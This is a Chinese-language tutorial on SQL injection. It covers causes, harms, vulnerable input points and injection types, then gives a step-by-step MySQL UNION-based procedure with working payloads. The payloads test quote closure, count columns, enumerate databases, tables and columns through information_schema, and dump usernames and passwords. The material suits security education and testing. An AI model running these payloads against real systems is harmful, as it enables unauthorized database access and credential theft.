SQL注入漏洞

1、简介

SQL注入漏洞的原理是由于开发者在编写操作数据库 代码时，直接将外部可控的参数拼接到SQL语句中，没有经过任 何过滤或过滤不严谨，导致攻击者可以使恶意语句在数据库引擎 中执行。

2、漏洞危害

SQL注入是直接面对数据库进行攻击的， 其主要有以下几种危害：

1. 权限较大情况下，可以通过SQL注入直接写入webshell或者直 接执行系统命令
2. 权限较小情况下，可通过注入获得管理员权限、拖库等等

3、易出现问题的功能点

SQL注入经常出现在登陆页面、涉及获取HTTP头（user-agent/client-ip等）的功能点及订单处理等地方。例如登陆页面， 除常见的万能密码，post数据注入外也有可能发生在HTTP头中 的client-ip和x-forward-for等字段处。这些字段是用来记录登陆的 ip的，有可能会被存储进数据库中从而与数据库发生交互导致sql 注入。

4、分类

4.1 依据注入点类型分类

• 数字类型的注入
• 字符串类型的注入
• 搜索型注入
• insert注入
• update注入
• delete注入

4.2 依据提交方式分类

• GET注入

• POST注入

• COOKIE注入

• HTTP头注入

  a) XFF注入

  b) UA注入

  c) REFERER注入

4.3 依据获取信息的方式分类

1. 基于布尔的盲注
2. 基于时间的盲注
3. 基于报错的注入
4. 联合查询注入
5. 堆查询注入 (可同时执行多条语句 )

5、SQL注入的基本流程

当MySQL>= 5.0时，一般考虑的SQL基本注入流程如下：

1）在登陆页面、涉及获取HTTP头（user-agent/client-ip等）的功能点及订单处理的地方，尝试添加如下SQL语句造成闭合，观察页面及抓包结果，寻找注入点；

# 数字类型
or 1=1#
# 字符类型或模糊搜索类型
' or 1=1#
# 包含搜索类型
') or 1=1#

2）获取字段数。通过不断尝试改变x的值来观察页面反应确定字段数，当查询报错时，x-1为当前语句的查询字段数；

# 数字类型
order by x#
# 字符类型或模糊搜索类型
' order by x#
# 包含搜索类型
') order by x#

3）获取系统数据库名。 在MySQL >5.0中，数据库名存放在information_schema数据库下schemata表schema_name字段中 ；

# 根据之前获取到的字段数，将语句查询字段补充至与获取字段数一致
# 数字类型
union select 1,2,...,schema_name from information_schema.schemata#
# 字符类型或模糊搜索类型
' union select 1,2,...,schema_name from information_schema.schemata#
# 包含搜索类型
') union select 1,2,...,schema_name from information_schema.schemata#

4）获取当前数据库名；

# 参照之前的闭合构造方式，补充闭合字符串到下述语句
union select 1,2,...,database()

5）获取数据库中的表 ；

# 参照之前的闭合构造方式，补充闭合字符串到下述语句
union select 1,2,...,group_concat(table_name) from information_schema.tables where 
table_schema=database()

6）获取表中的字段 ，这里假设要获取的目标表为user，实际情况可能要根据上一步获取的表名信息做多次尝试；

# 参照之前的闭合构造方式，补充闭合字符串到下述语句
union select 1,2,...,group_concat(column_name) from information_schema.columns where 
table_schema=database() and table_name='users'

7）获取各个字段的值。 这里假设已经获取到表名为user，且字段为username和password。

# 参照之前的闭合构造方式，补充闭合字符串到下述语句
union select 1,2,...,group_concat(username,password) from users